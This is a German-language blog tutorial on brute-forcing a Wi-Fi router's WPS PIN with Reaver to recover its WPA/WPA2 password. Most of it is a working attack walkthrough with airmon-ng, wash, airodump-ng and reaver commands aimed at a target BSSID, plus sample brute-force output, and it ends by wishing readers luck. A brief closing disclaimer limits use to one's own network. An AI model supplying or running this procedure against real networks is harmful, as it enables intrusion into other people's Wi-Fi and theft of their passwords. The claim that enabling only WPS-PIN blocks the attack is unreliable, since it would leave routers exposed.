WPS Pin knacken und WPA Passwort auslesen mit Reaver Anleitung

WPS bedeutet Wi-Fi Protected Setup und kann, falls es in einem Wlan-Router aktiviert ist, eine grobe Sicherheitslücke öffnen.

In dieser Anleitung werden wir mit dem Reaver-Tool den 8-stelligen WPS-Pin auslesen, um dadurch das eigentliche WPA oder WPA2 Passwort zu erhalten!
 
Da der WPS-Pin aus lediglich maximal 11.000 verschiedenen Kombinationen bestehen kann, ist ein Angriff auf den WPS-Pin innerhalb weniger Stunden erfolgreich und man erhält das gesammte WPA/WPA2 Passwort auch wenn dieses aus 63 Stellen besteht!
 
Einzigster Schutz bietet eine einfache Lösung, indem man das WPS in den Router Einstellungen deaktiviert, bzw. nur die WPS-PBC oder WPS-PIN Einstellung aktiviert, da ein WPS-Angriff unter diesen Einstellungen auf den Router nicht möglich sind! Auch sind einige Router nicht vulnerabel oder haben überhaupt kein Wi-Fi Protected Setup und bleiben von daher für einen Angriff über die WPS-Pin Abfrage erfolglos!
 
WPS-Pin knacken - AP checken ob WPS aktiviert ist.
Schwierigkeitsstufe: Leicht - Mittel
Erfolgs Chancen (Falls lücke besteht): 100%
Ob an einem Wlan-Router überhaupt das WPS aktiviert wurde und er dadurch über das Wi-Fi Protected Setup angreifbar ist, kann man mit einem einfachen Befehl im Terminal nachschauen.
 
Wlankarte in Monitor setzen: -> airmon-ng start [Interface]
Beispiel Befehl:
 airmon-ng start wlan0 
 
Befehl:
 wash -i mon0 -C 
 
BSSID AP sniffen: -> airodump-ng [Mon Interface]
Beispiel Befehl:
 airodump-ng mon0 
 
BSSID und Channel aufschreiben.
 
Nun Reaver 1.4 downloaden und installieren.
 
Befehl:
 apt-get install reaver 
 
Sobald ihr dies getan habt führen wir den Angriff durch.
Dazu nutzen wir diesen Befehl:
 
Befehl:
 reaver -i  mon0 -b 00:11:22:33:44:55 -c 11 -f -vv
 
Monitor Interface Name
BSSID des Zieles
Channel 1-14
 
Info Funktionen:
-i = Interface
-b = BSSID
-c = Channel
-f = Fixierter Channel
-vv = Protokoll anzeigen
 
reaver --help = Hilfe aufrufen
 
 
Nun müsst ihr schauen ob der Router vulnerable ist, dies könnt ihr anhand der Protokollierung von Reaver erkennen.
 
Sollte da bsp. sowas stehen:
 
trying pin 00111456
sending...
recived...
trying pin 00222456
sending...
0,01% complete (4 seconds / password)
...
...
 
Dann läuft der Angriff und ihr solltet dem 10-18 Stunden Zeit geben.
 
Falls dort steht
Failed to Authentificate on AP
oder derartige Failed Nachrichten, könnte es daran liegen, dass ihr zu weit von dem AP entfernt steht, oder dieser einfach nicht kompatibel ist.
 
Ich wünsche euch nun viel Glück dabei!

 

 

 

Hinweise

Bevor ihr auf meinem Blog weiter nach irgendwelche Anleitungen sucht, bedenkt immer: 

Das Eindringen in fremden Netzwerken ist strafbar!

Bitte nutzt eure gesammelten Erfahrungen nur zum testen eures eigenen Netzwerkes!